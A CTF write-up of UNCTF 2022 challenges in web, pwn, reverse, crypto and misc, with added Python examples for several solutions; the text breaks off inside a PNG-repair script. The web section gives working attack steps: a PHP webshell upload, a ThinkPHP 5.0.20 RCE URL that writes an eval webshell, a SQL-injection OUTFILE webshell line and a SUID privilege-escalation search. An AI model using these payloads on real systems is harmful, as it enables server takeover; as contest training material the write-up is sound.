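Pre-preface: I absolutely love UNCTF! The challenges are fun and novel, just right for a noob like me to practice on and pick up some knowledge. Originally only the top 20 got small prizes, but that was later extended to the top 100, which I can't praise enough!

Preface: I'm a weakling who mostly does misc sign-in challenges. In the other categories I only know the very basics: broad but not deep.

This post records Alplexchur's solution approaches, which have a certain brain-stem-missing beauty to them. To any experts fated to end up here: your pointers are most welcome.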

Web

签到 (Sign-in) - Jilin Police College

A sign-in challenge, yay!
Opened it, no idea. Next one.

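easy_upload - Yunnan Police College

I tried uploading a few files and found that png is accepted, so I wrote the most basic one-line webshell in a txt file. (Dang, I originally had it written out here, but the post got flagged by antivirus once published, so search for the specific 🐴 yourself. You can also study the various bypass tricks for 🐴; the most primitive one is enough here.)
Change the extension to png, upload, capture the request with burp and send it to repeater.
In the request, change the extension to php, then connect antsword to the URL where the uploaded file is temporarily stored; the password is cmd.
http://79d61743-4b56-47b1-82c9-5161d5005a44.node.yuzhian.com.cn/uplO4d/1.php
The flag is in the /home/ctf/flag directory~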

UNCTF{726e4ec5-6016-457c-a562-39968f9dea02}

ezgame - Zhejiang Normal University

Press ctrl+u to view the page source and see that it loads main.js. Follow main.js and search for the string ctf.

{function _0x1a71(_0x576391,_0x47cdf6){var _0x33c239=_0x3005();return _0x1a71=function(_0x18fbb7,_0x4f7b9f){_0x18fbb7=_0x18fbb7-(-0x40*0x85+-0x9dc*0x3+0x658*0xa);var _0x5a7e37=_0x33c239[_0x18fbb7];return _0x5a7e37;},_0x1a71(_0x576391,_0x47cdf6);}function _0x3005(){var _0x313bce=['86VkibmA','fe7b163f8d','6833565vBFVDj','23742ODGjjF','unctf{c5f9','d3}','1335DfKYdi','6442920PCnqhb','781140poNcpx','a27d-6f88-','795305dViflS','1569524rbiRmt','49fb-a510-','88IpXszc','13033ieCwIU','6GgaKPA'];_0x3005=function(){return _0x313bce;};return _0x3005();}var _0x57214f=_0x1a71;(function(_0x5f4f7e,_0x564c49){var _0x5561c3=_0x1a71,_0x56ec78=_0x5f4f7e();while(!![]){try{var _0xe4411f=-parseInt(_0x5561c3(0xa5))/(-0x2369+-0x618*0x4+0x3bca)*(parseInt(_0x5561c3(0xa7))/(0xac1+-0x3*0x881+-0x1*-0xec4))+parseInt(_0x5561c3(0xa6))/(0x24c5+0x783+-0x2c45)*(parseInt(_0x5561c3(0xa2))/(-0xe2e+-0x1c7d+0x2aaf))+-parseInt(_0x5561c3(0x9d))/(-0x1870+-0x1*-0x1dbd+-0x548)*(-parseInt(_0x5561c3(0xaa))/(-0x9*-0x287+0x5*-0x165+-0x2a0*0x6))+-parseInt(_0x5561c3(0xa1))/(0x4*0x9a3+-0x7*0x1d2+-0x19c7)+parseInt(_0x5561c3(0x9e))/(-0x27b+-0x206*-0x6+-0x9a1)+-parseInt(_0x5561c3(0xa9))/(0x66b+0xa39+-0x109b*0x1)+parseInt(_0x5561c3(0x9f))/(-0x8ba+0x1f1*0x10+0xb26*-0x2)*(-parseInt(_0x5561c3(0xa4))/(0x2548+0x1e3+-0x2720));if(_0xe4411f===_0x564c49)break;else _0x56ec78['push'](_0x56ec78['shift']());}catch(_0x1ed64e){_0x56ec78['push'](_0x56ec78['shift']());}}}(_0x3005,-0x909e0+0x62296*0x2+0x5bf33),alert(_0x57214f(0xab)+_0x57214f(0xa0)+_0x57214f(0xa3)+_0x57214f(0xa8)+_0x57214f(0x9c)));}

This turns up a big suspicious blob. Paste it into the F12 console and run it, and the flag pops up.

unctf{c5f9a27d-6f88-49fb-a510-fe7b163f8dd3}

我太喜欢bilibili大学啦 (I Love bilibili University So Much) - North University of China

Open the URL, ctrl+f for ctf, and it shows up right away.

UNCTF{c25f60f5-1651-44de-b0c5-c47d8f477eeb}

babyphp - People's Public Security University of China

Run a scanner, find index.php, and open it.

<?php
highlight_file(__FILE__);
error_reporting(0);
if(isset($_POST["a"])){
    if($_POST["a"]==0&&$_POST["a"]!==0){
        if(isset($_POST["key1"])&isset($_POST["key2"])){
            $key1=$_POST["key1"];
            $key2=$_POST["key2"];
            if ($key1!==$key2&&sha1($key1)==sha1($key2)){
                if (isset($_GET["code"])){
                    $code=$_GET["code"];
                    if(!preg_match("/flag|system|txt|cat|tac|sort|shell|\.| |\'/i", $code)){
                        eval($code);
                    }else{
                        echo "有手就行</br>";
                    }
                }else{
                    echo "老套路了</br>";
                }
            }else{
                echo "很简单的,很快就拿flag了~_~</br>";
            }
        }else{
            echo "百度就能搜到的东西</br>";
        }
    }else{
        echo "easy 不 easy ,baby 真 baby,都是玩烂的东西,快拿flag!!!</br>";
    }
}

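OK, audit the code and start bypassing. First use a=0 to get past the first layer.
A quick introduction to loose comparison: in PHP, == is a loose comparison. For some inputs, the sha1 or md5 digest starts with 0e (followed only by digits). PHP's loose comparison then treats such strings as numbers in scientific notation, so they all equal 0. Alternatively, bypass with arrays: pass arrays in, and sha1 and md5 both return NULL.

A few such special values are listed below.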

md5
240610708:0e462097431906509019562988736854
QLTHNDT:0e405967825401955372549139051580
QNKCDZO:0e830400451993494058024219903391
PJNPDWY:0e291529052894702774557631701704
NWWKITQ:0e763082070976038347657360817689
NOOPCJF:0e818888003657176127862245791911
MMHUWUV:0e701732711630150438129209816536
MAUXXQC:0e478478466848439040434801845361
sha1
10932435112: 0e07766915004133176347055865026311692244
aaroZmOk: 0e66507019969427134894567494305185566735
aaK1STfY: 0e76658526655756207688271159624026011393
aaO8zKZF: 0e89257456677279068558073954252716165668
aa3OFF9m: 0e36977786278517984959260394024281014729
0e1290633704: 0e19985187802402577070739524195726831799
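
The loose-comparison behaviour described above, modelled in Python beside the strict check that closes it. This is an added example, not part of the original write-up or the challenge code; `php_loose_equal` is a simplified model covering only the two cases discussed here, `strict_digest_equal` plays the role of PHP's `===` / `hash_equals()`, and all function names are chosen for this example.

```python
import hashlib
import hmac
import re

# A string such as "0e462097..." is a numeric string in PHP: 0 * 10**N == 0.
# When both operands of == are numeric strings, PHP compares them as numbers.
_ZERO_EXP = re.compile(r"0+e[0-9]+")


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def sha1_hex(s):
    return hashlib.sha1(s.encode()).hexdigest()


def is_magic_digest(hexdigest):
    """True if the digest is '0e' followed only by decimal digits."""
    return _ZERO_EXP.fullmatch(hexdigest) is not None


def php_loose_equal(a, b):
    """Simplified model of PHP == for digests (str) and NULL (None)."""
    if a is None and b is None:
        return True              # sha1(array) yields NULL on PHP < 8
    if isinstance(a, str) and isinstance(b, str):
        if is_magic_digest(a) and is_magic_digest(b):
            return True          # both sides evaluate to the number 0
        return a == b
    return False


def strict_digest_equal(a, b):
    """Hardened check: require strings, compare every byte in constant time."""
    if not (isinstance(a, str) and isinstance(b, str)):
        return False
    return hmac.compare_digest(a.encode(), b.encode())


def check_pair(key1, key2):
    """Compare sha1(key1) and sha1(key2) the weak way and the strict way."""
    d1, d2 = sha1_hex(key1), sha1_hex(key2)
    return {"loose": php_loose_equal(d1, d2),
            "strict": strict_digest_equal(d1, d2)}


if __name__ == "__main__":
    # Inputs taken from the list above
    print(md5_hex("QNKCDZO"), is_magic_digest(md5_hex("QNKCDZO")))
    print(check_pair("aaroZmOk", "aaK1STfY"))
    # Array case: both digests are NULL under the weak check
    print(php_loose_equal(None, None), strict_digest_equal(None, None))
```
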

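我太喜欢bilibili大学啦修复版 (I Love bilibili University So Much, Fixed Version) - North University of China

Search for hint and find YWRtaW5fdW5jdGYucGhw; base64-decoding it gives admin_unctf.php
Going there shows a login page; capturing the traffic gives the account and password unctf2022.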

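随便注 (Casual Injection) - Yunnan Police College

Such a familiar challenge, I feel like I've done it somewhere before. Let's run sqlmap.

sqlmap -u URL/?id=1 --dbs # enumerate database names
sqlmap -u URL/?id=1 -D ctftraining --tables # enumerate table names
sqlmap -u URL/?id=1 -D ctftraining -T FLAG_TABLE --columns # enumerate column names
sqlmap -u URL/?id=1 -D ctftraining -T FLAG_TABLE -C FLAG_COLUMN --dump # dump column values

I excitedly finished dumping everything only to find the column value was empty. Utter madness! So I went through the whole database and saw tables named bird, dog and so on, with a hint there saying the flag is in the database. Later I thought of using SQL injection to write a one-line 🐴 and get a shell. After a few tries I got the 🐴 added to index.php, but I still couldn't connect, which is a bit odd.

id=1' union select 1,"put the one-line 🐴 here",3 into OUTFILE '/var/www/html/index.php' --+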

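给你一刀 (Here's a Knife for You) - Southwest University of Science and Technology

Open the page and pass any GET parameter such as s=1; the error message reveals version 5.0.20. Then I started searching and found a vulnerability that allows getshell.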

/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=test.php&vars[1][]=<?php highlight_file(__FILE__);@eval($_POST[cmd]);?>

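Send it, then connect AntSword to test.php with the password cmd to get a shell. After poking around I found the privileges were insufficient, so I went into the virtual terminal to escalate privileges.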
find / -user root -perm -4000 -print 2>/dev/null

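ez2048 - Central South University

The classic 2048 never gets old. I excitedly opened F12 and, whoa, nice, it pops a debugger at me every 100 ms. OK, click "deactivate breakpoints" or press the shortcut ctrl+f8 to counter the anti-debugger directly.
setInterval(() => new Function().constructor("debugger").apply("action"), 100);
In game.js, find the listenerFn(direction) function, which contains tile.value * 2. Change the 2 to 512 so that a few merges get you to 2048. After that, you still need an invitation code.
Below it there is also a checkInvited function. I tried to reverse it, found I couldn't, and gave up; I'll leave it for someone fated to crack it~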

checkInvited() {
    let args = [...arguments];
    let buf = new ArrayBuffer(24);
    const view = new DataView(buf);
    view.setUint8(0, 68);
    view.setUint8(1, 51);
    view.setUint8(2, 15);
    view.setUint8(3, 80);
    view.setUint16(4, 0x0e5d, true);
    view.setUint16(6, 0x323a, true);
    view.setUint16(8, 0x3058, true);
    view.setUint16(10, 0x1a2a, true);
    view.setUint32(12, 0x0512160d, true);
    view.setUint32(16, 0x02560002);
    view.setUint32(20, 0x130000);
    function check(code) {
      if (code.length !== 24) return false;
      let encode = [];
      for (let i = 0; i < code.length; i++) {
        if (~i % 2 === 0) {
          encode.push(code.charCodeAt(i) ^ code.charCodeAt(i - 2));
        } else {
          encode.push(code.charCodeAt(i) ^ code.charCodeAt(i + 1));
        }
      }
      for (let i = 0; i < code.length; i++) {
        if (view.getInt8(i) !== encode[i]) return false;
      }
      return true;
    }
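
The encoding in check() is a XOR chain: every odd index is XORed with the odd index before it (index 1 with nothing), and every even index with its right-hand neighbour, so the 24 target bytes can be inverted one by one. The following Python port is an added example, not part of the original write-up or the game's code; the names `build_target`, `encode` and `recover` are chosen here.

```python
import struct


def build_target():
    """Rebuild the 24-byte DataView buffer exactly as checkInvited() fills it."""
    # Four setUint8 calls, four setUint16 and one setUint32 with the
    # littleEndian argument set to true.
    head = struct.pack("<4B4HI",
                       68, 51, 15, 80,
                       0x0E5D, 0x323A, 0x3058, 0x1A2A,
                       0x0512160D)
    # The last two setUint32 calls omit that argument, so DataView
    # writes them big-endian.
    tail = struct.pack(">2I", 0x02560002, 0x130000)
    return head + tail


def encode(code):
    """Port of the first loop in check(). (~i % 2 === 0) is true for odd i."""
    b = code.encode("latin-1")
    out = []
    for i in range(len(b)):
        if i % 2 == 1:
            # charCodeAt(-1) is NaN and x ^ NaN == x, so index 1 is stored as-is
            prev = b[i - 2] if i >= 2 else 0
            out.append(b[i] ^ prev)
        else:
            out.append(b[i] ^ b[i + 1])
    return out


def recover(target):
    """Invert encode(): solve the odd positions first, then the even ones."""
    code = bytearray(len(target))
    prev = 0
    for i in range(1, len(target), 2):
        code[i] = target[i] ^ prev      # code[i] = enc[i] ^ code[i-2]
        prev = code[i]
    for i in range(0, len(target), 2):
        code[i] = target[i] ^ code[i + 1]
    return code.decode("latin-1")


if __name__ == "__main__":
    target = build_target()
    invite = recover(target)
    print(invite)
    # Round trip: the recovered code must encode back to the target bytes
    print(encode(invite) == list(target))
```
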

Pwn

welcomeUNCTF2022 - Yunnan Police College

int func()
{
  char s2[11]; // [esp+Ch] [ebp-1Ch] BYREF
  char s[13]; // [esp+17h] [ebp-11h] BYREF

  strcpy(s2, "UNCTF&2022");
  puts("Welcome to UNCTF2022 Please enter the password:");
  gets(s);
  if ( !strcmp(s, s2) )
    return system("cat /flag");
  else
    return puts("wrong!!!");
}

Connecting by hand doesn't really work because the \n gets sent along too, so let's write a script.

from pwn import *
context.log_level = 'debug'
io= remote("node.yuzhian.com.cn",31308)
payload=b"UNCTF&2022"
io.sendline(payload)
io.interactive()

UNCTF{564914f4-8362-41a8-a84f-9b87aac8630c}

Reverse

whereisyourkey - Guangdong Ocean University

a=[118,103,112,107,99,109,104,110,99,105]
b=""
for i in range(len(a)):
    #print(chr(a[i]))
    if(a[i]==109):
        b+=chr(a[i])
    elif(a[i]<=110):
        b+=chr(a[i]-2)
    elif (a[i]>111):
        b+=chr(a[i]+3)
print(b)

UNCTF{yesiamflag}

ezzzzre - Guangdong Ocean University

a='HELLOCTF'
b=''
for i in a:
    b+=chr(2*ord(i)-69)
print(b)

UNCTF{KESSYAcG}

Crypto

md5-1 - Southwest University of Science and Technology

from hashlib import md5

ans=''
sheet=['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'
,'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'
,'0', '1', '2', '3', '4', '5', '6', '7', '8', '9','{','}']

with open("out.txt") as o:
    lines = o.readlines()
for line in lines:
    for i in sheet:
        if(line[0:-1] == md5(i.encode()).hexdigest()):
            ans+=i
print(ans)

UNCTF{e84fed028b9046fc0e8f080e96e72184}

md5-2 - Southwest University of Science and Technology


from hashlib import md5

ans=''
sheet=['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'
,'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'
,'0', '1', '2', '3', '4', '5', '6', '7', '8', '9','{','}']
temp=[]
with open("233.txt") as o:
    lines = o.readlines()
for i in range(len(lines)):
    if(i==0):
        temp.append(lines[0][0:-1])
    else:
        temp.append(str(hex(int(lines[i][:-1],16)^int(temp[i-1],16)))[2:])  # XOR; note that it must be XORed with the previous line's result

for i in range(len(temp)):
    if(len(temp[i])!=32):
        temp[i]="0"*(32-len(temp[i]))+temp[i]  # hex() drops leading zeros; pad md5 values that start with 0 back to 32 digits
        
for i in temp:
    for j in sheet:
        if(i == md5(j.encode()).hexdigest()):
            ans+=j
print(ans)

UNCTF{a197271943ceb3c3fe98bcadf10c29d4}

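dddd - Southwest University of Science and Technology

Morse code at a glance. Remove the /, use ctrl+h to replace the symbols, trying both assignments of 0 and 1, and you get the flag.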

UNCTF{Y4S_TH1S_JUST_M0RSE}

ezxor - Zhejiang Normal University

https://www.ruanx.net/many-time-pad/
https://www.cnblogs.com/labster/p/13635902.html
Use these two articles together; I did the OCR by eye until my eyes hurt...

UNCTF{Y0u_are_very_Clever!!!}

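Single table - Southwest University of Science and Technology

A single-table cipher.
I found the pattern shown in the figure; a variant of the Playfair cipher?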

table=[
    'B','C','D','E','F',
    'G','H','I','K','M',
    'N','O','Q','R','S',
    'T','U','V','W','X',
    'Z','P','L','A','Y']
key="PLAY"
c="OTUBM{BCQS_PHW_OQAU_AYFMKLWS}"
d=OT UB MB CQ SP HW OQ AU AY FM KL WS
p=UN CT FG OD YO UK NO WP LA YF AI RX

The underscores were a bit odd, so I corrected them myself.

UNCTF{GOD_YOU_KNOW_PLAYFAIR}

caesar - Southwest University of Science and Technology

a="B6vAy{dhd_AOiZ_KiMyLYLUa_JlL/HY_}"
b=["{","}","_"]
sheet=['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T',
                'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n',
                'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7',
                '8', '9', '+', '/']  # the base64 table, without the equals sign
ans=''
for i in range(len(sheet)):
    for j in range(len(a)):
        if(a[j] in b):
            ans+=a[j]
        else:
            ans+=sheet[(sheet.index(a[j])+i) % len(sheet)]
    print(ans)
    ans=""

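A Caesar cipher over a different table. Look up the base64 alphabet online and brute-force every shift; the line starting with UNCTF is the flag. Note that the trailing _ has to be removed.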

UNCTF{w0w_Th1s_d1fFerent_c4eSar}

ezRSA - Guangdong Ocean University

Challenge

import libnum

p=libnum.generate_prime(256)
e=65537
m=flag

m=libnum.s2n(m)
n=p**4
phi_n=p**4-p**3
d=libnum.invmod(e,phi_n)
c=pow(m,e,n)

print ("n=",n)
print ("e=",e)
print ("c=",c)
n= 62927872600012424750752897921698090776534304875632744929068546073325488283530025400224435562694273281157865037525456502678901681910303434689364320018805568710613581859910858077737519009451023667409223317546843268613019139524821964086036781112269486089069810631981766346242114671167202613483097500263981460561
e= 65537
c= 56959646997081238078544634686875547709710666590620774134883288258992627876759606112717080946141796037573409168410595417635905762691247827322319628226051756406843950023290877673732151483843276348210800329658896558968868729658727981445607937645264850938932045242425625625685274204668013600475330284378427177504

n is 308 digits, which is fairly small, so factor it directly with yafu. One second later we get

p=89065756791595323358603857939783936930073695697065732353414009005162022399741

phi_p=p^4-p^3=62927872600012424750752897921698090776534304875632744929068546073325488283529318867491016397452175403161432810606988470934463805691818871507671400886648566908233760842017413498368260708453999854033497856778333075381078231548226770214171227019321093546024517072860049563292200161449041449144992746910155634540

d=20755434245111441985630630658642078981728878865246767694382496786868543795669160270376822412489528411656583786778165964077076607471113366899763873866148823142474952688726191467121295199260595706925676940844415334199572562875115886673932667702971523842880601203090511182387417774537779879529398099046491664193

Then drop these into RSATool to decrypt and get the plaintext.

UNCTF{pneum0n0ultram01cr0sc0p01cs01l01c0v0lcan0c0n010s01s}
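
Because n = p**4 here, p can also be taken as an exact integer fourth root, with no factoring tool involved. The sketch below is an added example, not code from the original write-up or the challenge; it runs on a constructed key (p = 2**127 - 1) and a constructed message, and the function names are chosen here. Substitute the challenge's n, e and c to reproduce the result above.

```python
from math import isqrt

E = 65537
SAMPLE_MESSAGE = b"constructed-demo{n_is_p_to_the_4th}"   # constructed plaintext


def fourth_root(n):
    """Exact integer fourth root; raises if n is not a perfect fourth power."""
    r = isqrt(isqrt(n))
    if r ** 4 != n:
        raise ValueError("n is not a perfect fourth power")
    return r


def decrypt_p4(n, e, c):
    """Decrypt RSA where n = p**4, using phi(n) = p**4 - p**3 as in the challenge."""
    p = fourth_root(n)
    phi = p ** 4 - p ** 3
    d = pow(e, -1, phi)               # modular inverse (Python 3.8+)
    m = pow(c, d, n)                  # correct whenever gcd(m, p) == 1
    plaintext = m.to_bytes((m.bit_length() + 7) // 8, "big")
    return p, d, plaintext


def make_sample():
    """Constructed instance mirroring the challenge generator, with a known prime."""
    p = 2 ** 127 - 1                  # Mersenne prime, stands in for generate_prime(256)
    n = p ** 4
    m = int.from_bytes(SAMPLE_MESSAGE, "big")
    return n, E, pow(m, E, n)


if __name__ == "__main__":
    n, e, c = make_sample()
    p, d, plaintext = decrypt_p4(n, e, c)
    print("p =", p)
    print("plaintext =", plaintext)
```
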

babyRSA - Guangdong Ocean University

Challenge

from Crypto.Util.number import *
from secret import flag
import libnum
flag="UNCTF{*************************}" 
m=libnum.s2n(flag)
p=libnum.generate_prime(1024)
q=libnum.generate_prime(1024)
n=p*q
e=6
c=pow(m,e,n)
M=((m>>60)<<60)
print("n=",n)
print("c=",c)
print("((m>>60)<<60)=",M) 


'''
n=25300208242652033869357280793502260197802939233346996226883788604545558438230715925485481688339916461848731740856670110424196191302689278983802917678262166845981990182434653654812540700781253868833088711482330886156960638711299829638134615325986782943291329606045839979194068955235982564452293191151071585886524229637518411736363501546694935414687215258794960353854781449161486836502248831218800242916663993123670693362478526606712579426928338181399677807135748947635964798646637084128123883297026488246883131504115767135194084734055003319452874635426942328780711915045004051281014237034453559205703278666394594859431
c=15389131311613415508844800295995106612022857692638905315980807050073537858857382728502142593301948048526944852089897832340601736781274204934578234672687680891154129252310634024554953799372265540740024915758647812906647109145094613323994058214703558717685930611371268247121960817195616837374076510986260112469914106674815925870074479182677673812235207989739299394932338770220225876070379594440075936962171457771508488819923640530653348409795232033076502186643651814610524674332768511598378284643889355772457510928898105838034556943949348749710675195450422905795881113409243269822988828033666560697512875266617885514107
M=11941439146252171444944646015445273361862078914338385912062672317789429687879409370001983412365416202240
'''

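e is very small, a typical small-e case for a tool. Here I strongly recommend Feng's 轩禹CTF_RSA工具 3.6 (XuanYu CTF_RSA tool)! One shot and done.
This gives m=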

11941439146252171444944646015445273361862078914338385912062672317789429687879409370002429378909002883709

Then libnum.n2s(m) gives the flag.

UNCTF{27a0aac7-76cb-427d-9129-1476360d5d1b}

easy_RSA - People's Public Security University of China

Challenge

from Crypto.Util.number import *
from gmpy2 import *
from secret import flag
import random
assert flag.startwith(b"flag{")
e=0x10001
c=6423951485971717307108570552094997465421668596714747882611104648100280293836248438862138501051894952826415798421772671979484920170142688929362334687355938148152419374972520025565722001651499172379146648678015238649772132040797315727334900549828142714418998609658177831830859143752082569051539601438562078140 
n=102089505560145732952560057865678579074090718982870849595040014068558983876754569662426938164259194050988665149701199828937293560615459891835879217321525050181965009152805251750575379985145711513607266950522285677715896102978770698240713690402491267904700928211276700602995935839857781256403655222855599880553
m=bytes_to_long(flag)
p=getprime(512)
q=getprime(512)
n=p*q
c=pow(m,e,n)
print("n={}".format(n))
print("c={}".format(c))
tmp=random.randint(100,300)
print("p>>tmp={}".format(p>>tmp))


#c=6423951485971717307108570552094997465421668596714747882611104648100280293836248438862138501051894952826415798421772671979484920170142688929362334687355938148152419374972520025565722001651499172379146648678015238649772132040797315727334900549828142714418998609658177831830859143752082569051539601438562078140 

#n=102089505560145732952560057865678579074090718982870849595040014068558983876754569662426938164259194050988665149701199828937293560615459891835879217321525050181965009152805251750575379985145711513607266950522285677715896102978770698240713690402491267904700928211276700602995935839857781256403655222855599880553

#p>>200=8183408885924573625481737168030555426876736448015512229437332241283388177166503450163622041857

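n, c and the high bits of p (p>>200) are known, so this is the RSA leaked-high-bits-of-p attack. Feng's RSA 3.6 tool has a built-in script for it, so I used the copy-paste engineer's three keys and adjusted the parameters myself. My computer has no sage installed, so I ran it in the web version~
https://cocalc.com/
Note that you need to pick MathSage in JupyterLab.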

from sage.all import *
e = 0x10001
c=6423951485971717307108570552094997465421668596714747882611104648100280293836248438862138501051894952826415798421772671979484920170142688929362334687355938148152419374972520025565722001651499172379146648678015238649772132040797315727334900549828142714418998609658177831830859143752082569051539601438562078140 
n=102089505560145732952560057865678579074090718982870849595040014068558983876754569662426938164259194050988665149701199828937293560615459891835879217321525050181965009152805251750575379985145711513607266950522285677715896102978770698240713690402491267904700928211276700602995935839857781256403655222855599880553
p4 = 8183408885924573625481737168030555426876736448015512229437332241283388177166503450163622041857

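pbits = 512
kbits = pbits - p4.nbits()      # number of unknown low bits of p
print(p4.nbits())
p4 = p4 << kbits                # put the known high bits back in position
PR.<x> = PolynomialRing(Zmod(n))
f = x + p4
# Coppersmith: find a small root x of f modulo an unknown factor of n
roots = f.small_roots(X=2^kbits, beta=0.4)
if roots:
    p = p4 + int(roots[0])
    print("n: ", n)
    print("p: ", p)
    print("q: ", n // p)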

Result

312
n:  102089505560145732952560057865678579074090718982870849595040014068558983876754569662426938164259194050988665149701199828937293560615459891835879217321525050181965009152805251750575379985145711513607266950522285677715896102978770698240713690402491267904700928211276700602995935839857781256403655222855599880553
p:  13150231070519276795503757637337326535824298772055543325920447062237907554543786311611680606624189166397403108357856813812282725390555389844248256805325917
q:  7763324082495716852870824316200424018139567206154696104953385573761033160220038511251268217230653629388520339723337700045392099450472580225771046069366909

UNCTF{It is a very_intersting_test!!!}

Misc

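剥茧抽丝 (Peeling the Cocoon) - Inner Mongolia Police Vocational College

Use S?e?a?o?r?p?y to open the first attachment, which gives a 1.txt with zero-width character steganography and a flag.zip.
Decoding the zero-width steganography gives the ciphertext egmtteuec
flag.zip contains 2.txt and flag.zip. I tried pseudo-encryption, to no avail. Noticing that the two txt files might be related, I compressed the Chinese part of 1.txt and ran a known-plaintext attack, which successfully recovered the contents.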

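syslog - Zhejiang Normal University

Look at the attachment in 010 and see that the zip contains another archive; drop it into kali.
binwalk stytem.zip -e
This gives a password-protected flag.zip
Open syslog and search for ==, which turns up a password string; base64-decoding it gives the archive password: password is U6nu2_i3_b3St
Then extract with that password to get the flag~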

UNCTF{N1_sH3_D0n9_L0g_dE!}

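magic_word - Southwest University of Science and Technology

Change the extension to zip and find the body text in document.xml, where there is zero-width steganography. Now some of you will ask: how am I supposed to know whether there is zero-width character steganography here, get outta here! OK, next I'll show you how to tell whether it is zero-width character steganography.

  • Open it as plain txt, place the cursor in a few spots, and see whether the column numbers look odd
  • Paste it into CyberChef; if there are zero-width characters, little dots appear.

Here is the CyberChef address. Online access is rather slow, so I strongly recommend downloading it locally. It's really handy; open the site and grab the latest Release.
https://github.com/gchq/CyberChef
Find a website to decode it
https://330k.github.io/misc_tools/unicode_steganography.html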

The Old Man and the SeaHe was an old man who fished alone in a skiff in the Gulf Stream ‌‌‌‌‍‍‍and he had gone eighty-four days‌‌‌‌‍‬‬ now without taking a fish. In the first forty days a boy had been with him. But after forty days without a fish the boy's parents had told him that the old man was now definitely and finally salao,which ‌‌‌‌‍‬‌is the worst form of unlucky, and‌‌‌‌‍‍‌ the boy had gon at their orders in another boat which caught three good fish‌‌‌‌‍‬‍‬ the first week. It made the boy sad to see the old man come in each day with his‌‌‌‌‍‬ saking a fish. In the first forty days a boy had‌‌‌‌‍‍‍ been with him. But after forty days without a fish ‌‌‌‌‍‬‍‍the boy's parents ‌‌‌‌‌‌‍had told him that the old man was now definitely‌‌‌‌‍‬‌ and finally salao,which ‌‌‌‌‍‬is the worst form of unlucky, and the boy had gone at their orders ‌‌‌‌‍‬‍in another boat which caught three good fish the first week. It made the boy sad to‌‌‌‌‍‬‍‍ see the old man come in each day with his skiff empty and he always went down to help ‌‌‌‌‍‍him carry either the coiled lines or the gaff and harpoon and the sail that was furled aroundthe mast. The sail was patched‌‌‌‌‍‬‬ with flour sacks and, furled, it looked like the flag of permanent defeat.The old man was thin and gaunt with deep wrinkles in the back of his neck.The brown blotches of the benevolent skin cancer‌‌‌‌‍‬‍‍ the sun brings from its reflection on the tropic sea‌‌‌‌‍‍ were‌‌‌‌‍‍ on his cheeks. The blotches ran well down the sides of his face and his hands had the deep-creased scars from handling heavy fish on the cords. But none of these scars were fresh. They were as old as ‌‌‌‌‍‬‌erosions in fishless desert.‌‌‌‌‍‍‌‌‌‌‌‍‬‍‬‌‌‌‌‍‬‍‍‌‌‌‌‍‌‬‌‌‌‌‍‍

UNCTF{We1come_new_ctfer}
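
The two manual checks above can be scripted: pull the text out of word/document.xml and list every invisible Unicode format character with its offset. This is an added example, not part of the original write-up; the sample document is constructed in memory, the carrier characters in it (U+200C, U+200D, U+202C, U+FEFF) are an assumption for the demo, and the function names are chosen here.

```python
import io
import re
import unicodedata
import zipfile
from collections import Counter

# Word keeps the visible text in <w:t> elements of word/document.xml
_W_T = re.compile(r"<w:t(?:\s[^>]*)?>(.*?)</w:t>", re.DOTALL)


def docx_text(docx_bytes):
    """Concatenate the text runs of a .docx file (which is a zip archive)."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        xml = zf.read("word/document.xml").decode("utf-8")
    return "".join(_W_T.findall(xml))


def find_invisible(text):
    """Return (offset, 'U+XXXX') for each Unicode format (category Cf) character."""
    return [(i, "U+%04X" % ord(ch)) for i, ch in enumerate(text)
            if unicodedata.category(ch) == "Cf"]


def report(text):
    """Summarise hidden characters: counts per code point and consecutive runs."""
    hits = find_invisible(text)
    runs = []                               # [start offset, length]
    for off, _ in hits:
        if runs and runs[-1][0] + runs[-1][1] == off:
            runs[-1][1] += 1
        else:
            runs.append([off, 1])
    return {
        "total_chars": len(text),
        "visible_chars": len(text) - len(hits),   # what the cursor column suggests
        "by_codepoint": dict(Counter(cp for _, cp in hits)),
        "runs": [tuple(r) for r in runs],
    }


def make_sample_docx():
    """Constructed sample: a minimal zip holding only word/document.xml."""
    body = ("<w:document><w:body><w:p>"
            "<w:r><w:t>He was an old man\u200c\u200c\u200d who fished</w:t></w:r>"
            "<w:r><w:t xml:space=\"preserve\"> alone\u202c\ufeff in a skiff</w:t></w:r>"
            "</w:p></w:body></w:document>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", body.encode("utf-8"))
    return buf.getvalue()


if __name__ == "__main__":
    summary = report(docx_text(make_sample_docx()))
    for key, value in summary.items():
        print(key, "=", value)
```
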

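清和fan (Qinghe fan) - Jiangxi Police College

Searching on bilibili gives the archive password 836885_2022/05/20. LSB steganography: feeding the image into stegsolve gives the archive password qq857488580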

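巨鱼 (Giant Fish) - Henan Polytechnic University

The download is a rather large png. Looking at it in 010 shows an archive signature near the tail and a CRC error. Extract with foremost to get an archive; recovering the correct width and height gives the password 无所谓我会出手
Here is a script for recovering the correct width and height.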

import binascii
import struct
import sys

file = "C:\\Users\\Administrator\\Desktop\\" + input("图片的地址")
with open(file, 'rb') as f:
    fr = f.read()
data = bytearray(fr[0x0c:0x1d])                     # IHDR chunk type + data, the bytes the CRC covers
